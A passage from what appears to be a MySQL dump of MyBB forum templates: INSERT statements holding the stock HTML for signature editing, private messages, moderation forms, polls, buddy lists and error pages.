cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_sig}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"20%\"><span class=\"smalltext\">{$lang->edit_sig_note}</span> {$smilieinserter}</td> <td class=\"trow1\" width=\"80%\"> <textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$sig}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow2\"> <span class=\"smalltext\">{$lang->edit_sig_note2}</span> </td> <td class=\"trow2\"> <span class=\"smalltext\"> <label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"enable\" />&nbsp;{$lang->enable_sig_posts}</label><br /> <label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"disable\" />&nbsp;{$lang->disable_sig_posts}</label><br /> <label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"0\" checked=\"checked\" />&nbsp;{$lang->leave_sig_settings}</label></span> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_editsig\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_sig}\" /> <input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('366', 'usercp_editsig_suspended', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_sig}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <div class=\"error\"> <p><em>{$lang->edit_sig_error_title}</em></p> <ul> <li>{$lang->edit_sig_no_permission}</li> </ul> </div> <br /> {$signature} </td> </tr> </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('367', 'private_messagebit_denyreceipt', ' <span class=\"smalltext\"><a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}&amp;denyreceipt=1\">{$lang->deny_receipt}</a></span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('368', 'private_read_to', '<br /> {$lang->to} {$to_recipients} {$bcc}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('369', 'private_read_bcc', '<br />{$lang->bcc} {$bcc_recipients}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('370', 'private_read_action', '<tr> <td class=\"tcat\" align=\"center\"><strong>{$actioned_on}</strong></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('371', 'private_read', '<html> <head> <title>{$lang->viewing_pm} {$pm[\'subject\']}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\"> <strong>{$pm[\'subject\']}</strong> </td> </tr> {$action_time} {$message} </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('372', 'forumdisplay_inlinemoderation_col', '<td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" name=\"allbox\" onclick=\"inlineModeration.checkAll(this)\" /></td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('373', 'printthread_post', '<strong>{$postrow[\'subject\']}</strong> - {$postrow[\'profilelink\']} - <strong>{$postrow[\'date\']}</strong> <strong>{$postrow[\'time\']}</strong> <br /> <br /> {$postrow[\'message\']} <br /> <br /> <hr size=\"1\" />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('374', 'error_nopermission', '{$lang->error_nopermission_guest_1} <ol> <li>{$lang->error_nopermission_guest_2}</li> <li>{$lang->error_nopermission_guest_3}</li> <li>{$lang->error_nopermission_guest_4}</li> <li>{$lang->error_nopermission_guest_5}</li> </ol> <form action=\"member.php\" method=\"post\"> <input type=\"hidden\" name=\"action\" value=\"do_login\" /> <input type=\"hidden\" name=\"url\" value=\"{$redirect_url}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->login}</strong></span></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang_username}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" tabindex=\"1\" /></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->password}</strong></td> <td class=\"trow2\"><input type=\"password\" class=\"textbox\" name=\"password\" tabindex=\"2\" /></td> </tr> <tr> <td class=\"trow2\" colspan=\"2\"><span class=\"smalltext\" style=\"float:right; padding-top:3px;\"><a href=\"member.php?action=register\">{$lang->need_reg}</a> | <a href=\"member.php?action=lostpw\">{$lang->forgot_password}</a>&nbsp;</span>&nbsp;<input type=\"submit\" class=\"button\" value=\"{$lang->login}\" tabindex=\"3\" /></td> </tr> </table> </form> <br />', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('375', 'error_nopermission_loggedin', '{$lang->error_nopermission_user_1} <ol> <li>{$lang->error_nopermission_user_2}</li> <li>{$lang->error_nopermission_user_3}</li> <li>{$lang->error_nopermission_user_4} (<a href=\"member.php?action=resendactivation\">{$lang->error_nopermission_user_resendactivation}</a>)</li> <li>{$lang->error_nopermission_user_5}</li> </ol> <br /> {$lang->error_nopermission_user_username}', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('376', 'private_folders', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->pm_folders}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->existing_folders}</strong></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$lang->edit_folder_note}</span></td> </tr> {$folderlist} <tr> <td class=\"thead\"><strong>{$lang->new_folders}</strong></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$lang->add_folders_note}</span></td> </tr> {$newfolders} </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_folders\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_folders}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('377', 'forumjump_bit', '<option value=\"{$forum[\'fid\']}\" {$optionselected}>{$depth} {$forum[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('378', 'forumjump_special', '<select name=\"{$name}\"> <option value=\"index\" {$jumpsel[\'default\']}>{$lang->forumjump_select}</option> <option value=\"index\">--------------------</option> {$forumjumpbits} </select> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('379', 'moderation_move', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->move_copy_thread}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->move_copy_thread}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow1\"><strong>{$lang->new_forum}</strong></td> <td class=\"trow2\">{$forumselect}</td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->method}</strong></td> <td class=\"trow2\"> <label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"move\" />{$lang->method_move}</label><br /> <label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"redirect\" checked=\"checked\" />{$lang->method_move_redirect}</label> <input type=\"text\" class=\"textbox\" name=\"redirect_expire\" size=\"3\" /> {$lang->redirect_expire_note}<br /> <label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"copy\" />{$lang->method_copy}</label><br /> </td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->move_copy_thread}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_move\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('380', 'moderation_merge', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->merge_threads}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_threads}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->new_subject}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"subject\" value=\"{$thread[\'subject\']}\" size=\"40\" /></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->thread_to_merge_with}</strong><br /><span class=\"smalltext\">{$lang->merge_with_note}</span></td> <td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"threadurl\" size=\"40\" /> </td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_threads}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_merge\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('381', 'showthread_similarthreads_bit', '<tr> <td align=\"center\" class=\"{$trow}\" width=\"2%\">{$icon}</td> <td class=\"{$trow}\">{$similar_thread[\'threadprefix\']}<a href=\"{$similar_thread[\'threadlink\']}\">{$similar_thread[\'subject\']}</a></td> <td align=\"center\" class=\"{$trow}\">{$similar_thread[\'profilelink\']}</td> <td align=\"center\" class=\"{$trow}\"><a href=\"javascript:MyBB.whoPosted({$similar_thread[\'tid\']});\">{$similar_thread[\'replies\']}</a></td> <td align=\"center\" class=\"{$trow}\">{$similar_thread[\'views\']}</td> <td class=\"{$trow}\" style=\"white-space: nowrap\"> <span class=\"smalltext\">{$lastpostdate} {$lastposttime}<br /> <a href=\"{$similar_thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('382', 'polls_newpoll_option', '<tr> <td>{$lang->option} {$i}:&nbsp;</td> <td><input type=\"text\" class=\"textbox\" name=\"options[{$i}]\" value=\"{$option}\" size=\"25\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('383', 'showthread_poll_option_multiple', '<tr> <td class=\"trow1\" width=\"1%\"><input type=\"checkbox\" class=\"checkbox\" name=\"option[{$number}]\" id=\"option_{$number}\" value=\"1\" /></td> <td class=\"trow2\" colspan=\"3\">{$option}</td> </tr>', '-2', '1601', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('384', 'showthread_poll_option', '<tr> <td class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"option\" id=\"option_{$number}\" value=\"{$number}\" /></td> <td class=\"trow1\" colspan=\"3\">{$option}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('385', 'member_activate', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->account_activation}</title> {$headerinclude} </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->activate_account}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"30%\"><strong>{$lang->username}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" value=\"{$user[\'username\']}\" /></td> </tr> <tr> <td class=\"trow1\" width=\"30%\"><strong>{$lang->activation_code}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"code\" value=\"{$code}\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"activate\" /><input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->activate_account}\" /></div> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('386', 'smilieinsert', ' <div style=\"margin:auto; width: 170px; margin-top: 20px;\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" width=\"150\"> <tr> <td class=\"thead\"><span class=\"smalltext\"><strong>{$lang->smilieinsert}</strong></span></td> </tr> <tr> <td class=\"trow1\"> <table width=\"100%\" align=\"center\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\" id=\"clickable_smilies\"> {$smilies} </table> </td> </tr> {$getmore} </table> </div> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('387', 'misc_buddypopup_user_sendpm', '<a href=\"private.php?action=send&amp;uid={$buddy[\'uid\']}\" target=\"_blank\" onclick=\"window.opener.location.href=this.href; return false;\">{$lang->pm_buddy}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('388', 'usercp_editlists', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_lists}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/usercp.js\"></script> <script type=\"text/javascript\"> lang.remove_buddy = \'{$lang->confirm_remove_buddy}\'; lang.remove_ignored = \'{$lang->confirm_remove_ignored}\'; lang.adding_buddy = \'{$lang->adding_buddy}\'; lang.adding_ignored = \'{$lang->adding_ignored}\'; </script> </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <form action=\"usercp.php\" method=\"post\" id=\"buddy\" onsubmit=\"return UserCP.addBuddy(\'buddy\');\"> <input type=\"hidden\" name=\"action\" value=\"do_editlists\" /> <input type=\"hidden\" name=\"manage\" value=\"buddy\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\"><strong>{$lang->edit_buddy_list}</strong></td> </tr> <tr> <td class=\"trow1\"> <fieldset> <legend><strong>{$lang->add_buddies}</strong></legend> <span class=\"smalltext\">{$lang->add_buddies_desc}</span><br /> <div style=\"width: 120px; float: left; text-align: right;\"><strong>{$lang->username_or_usernames}</strong></div> <div style=\"margin-left: 130px;\"><input type=\"text\" name=\"add_username\" id=\"buddy_add_username\" style=\"width: 60%;\" class=\"textbox\" /> <input type=\"submit\" value=\"{$lang->add_to_buddies}\" id=\"buddy_submit\" class=\"button\" /></div> <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"buddy_add_username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"}); } // --> </script> </fieldset> <fieldset id=\"buddy_container\"> <legend><strong>{$lang->current_buddies}</strong></legend> <ul id=\"buddy_list\" style=\"list-style: none;\"> {$buddy_list} </ul> </fieldset> </td> </tr> </table> </form> <br /> <form action=\"usercp.php\" method=\"post\" id=\"ignored\" onsubmit=\"return UserCP.addBuddy(\'ignored\');\"> <input type=\"hidden\" name=\"action\" value=\"do_editlists\" /> <input type=\"hidden\" name=\"manage\" value=\"ignored\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\"><strong>{$lang->edit_ignore_list}</strong></td> </tr> <tr> <td class=\"trow1\"> <fieldset> <legend><strong>{$lang->add_ignored_users}</strong></legend> <span class=\"smalltext\">{$lang->add_ignored_users_desc}</span><br /> <div style=\"width: 120px; float: left; text-align: right;\"><strong>{$lang->username_or_usernames}</strong></div> <div style=\"margin-left: 130px;\"><input type=\"text\" name=\"add_username\" id=\"ignored_add_username\" style=\"width: 60%;\" class=\"textbox\" /> <input type=\"submit\" value=\"{$lang->ignore_users}\" id=\"ignored_submit\" class=\"button\" /></div> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"ignored_add_username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"}); } // --> </script> </fieldset> <fieldset id=\"ignored_container\"> <legend><strong>{$lang->current_ignored_users}</strong></legend> <ul id=\"ignore_list\" style=\"list-style: none;\"> {$ignore_list} </ul> </fieldset> </td> </tr> </table> </form> </td> </tr> </table> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('389', 'online_row', '<tr> <td class=\"trow1\">{$online_name}{$user_ip}</td> <td align=\"center\" class=\"trow2\">{$online_time}</td> <td class=\"trow1\" width=\"50%\">{$location}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('390', 'online_row_ip', '<br /><span class=\"smalltext\">{$lang->ip} {$user[\'ip\']} <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$user[\'ip\']}&amp;search_users=1\">{$lang->lookup}</a></span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('391', 'postbit_offline', '<img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" title=\"{$lang->postbit_status_offline}\" alt=\"{$lang->postbit_status_offline}\" />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('392', 'postbit_editedby', '<span class=\"smalltext\">({$post[\'editnote\']} {$post[\'editedprofilelink\']}.)</span> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('393', 'member_register_requiredfields', '<br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->additional_info}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> {$requiredfields} </table> </fieldset>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('394', 'member_register_customfield', '<tr> <td> {$profilefield[\'name\']} <br /> <span class=\"smalltext\">{$profilefield[\'description\']}</span> </td> </tr> <tr> <td>{$code}</td> </tr>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('395', 'error', '<html> <head> <title>{$title}</title> {$headerinclude} </head> <body> {$header} <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><span class=\"smalltext\"><strong>{$title}</strong></span></td> </tr> <tr> <td class=\"trow1\">{$error}</td> </tr> </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('396', 'index_whosonline_memberbit', '{$comma}{$user[\'profilelink\']}{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('397', 'member_profile_away', '<tr> <td class=\"trow1\" align=\"center\"> <strong>{$lang->away_note}</strong><br /> <span class=\"smalltext\"><em>{$lang->away_reason} {$awayreason}</em></span><br /> {$lang->away_since} {$awaydate} &nbsp;&nbsp;&nbsp; {$lang->away_returns} {$returndate} </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('398', 'forumdisplay_moderatedby', '<span class=\"smalltext\">{$lang->moderated_by} <strong>{$moderators}</strong></span><br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('399', 'forumbit_depth2_cat', '<tr> <td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td> <td class=\"{$bgcolor}\" valign=\"top\"> <strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$subforums}</div> </td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('400', 'forumbit_depth1_cat_subforum', '<tr> <td class=\"tcat\" colspan=\"6\"><strong>&raquo;&nbsp;&nbsp;<a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><span class=\"smalltext\">{$forum[\'description\']}</span></td></tr>{$sub_forums}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('401', 'misc_help', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->help_docs}</title> {$headerinclude} </head> <body> {$header} {$sections} {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('402', 'posticons', '<tr> <td class=\"trow1\" style=\"vertical-align: top\"><strong>{$lang->post_icon}</strong><br /><span class=\"smalltext\"><label><input type=\"radio\" class=\"radio\" name=\"icon\" value=\"-1\"{$no_icons_checked} />{$lang->no_post_icon}</label></span></td> <td class=\"trow1\" valign=\"top\">{$iconlist}</td> </tr> ', '-2', '1410', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('403', 'previewpost', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->post_preview}</strong></td> </tr> </table> {$postbit} <br /> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('404', 'misc_help_helpdoc', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->help_docs}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$helpdoc[\'name\']}</strong></td> </tr> <tr> <td width=\"100%\" class=\"trow1\">{$helpdoc[\'document\']}</td> </tr> </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('405', 'usercp_options_pppselect', '<tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->ppp}</span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"ppp\"> <option value=\"\">{$lang->use_default}</option> {$pppoptions} </select> </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('406', 'usercp_forumsubscriptions', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->forum_subscriptions}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"5\"><strong>{$lang->forum_subscriptions}</strong></td> </tr> <tr> <td class=\"tcat\" valign=\"bottom\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forum}</strong></span></td> <td class=\"tcat\" valign=\"bottom\" style=\"white-space: nowrap; text-align: center;\" width=\"85\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td> <td class=\"tcat\" valign=\"bottom\" style=\"white-space: nowrap; text-align: center;\" width=\"85\"><span class=\"smalltext\"><strong>{$lang->threads}</strong></span></td> <td class=\"tcat\" valign=\"bottom\" align=\"center\" width=\"200px\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td> </tr> {$forums} </table> </td> </tr> </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('407', 'member_register_stylebit', '<option value=\"{$style[\'sid\']}\">{$style[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('408', 'usercp_options_stylebit', '<option value=\"{$style[\'sid\']}\" {$selected}>{$style[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('409', 'forumdisplay_password_wrongpass', '<tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><strong>{$lang->wrong_forum_password}</strong></td> </tr> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('410', 'private_empty_folder', '<tr> <td class=\"trow1\"><strong>{$foldername}</strong></td> <td class=\"trow1\" align=\"center\">{$foldercount}</td> <td class=\"trow1\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"empty[{$fid}]\" value=\"1\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('411', 'misc_imcenter_msn', '<html> <head> <title>{$lang->msn_messenger_center}</title> {$headerinclude} </head> <body style=\"margin:0;left:0;top:0\" class=\"trow2\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\"><strong>{$user[\'username\']} - {$lang->msn_messenger_center}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td> </tr> <tr> <td class=\"trow1\" 